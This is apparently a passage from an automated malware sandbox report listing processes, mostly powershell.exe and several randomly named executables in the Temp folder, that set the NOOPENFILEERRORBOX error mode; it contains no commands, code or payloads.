                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeProcess information set: NOOPENFILEERRORBOX
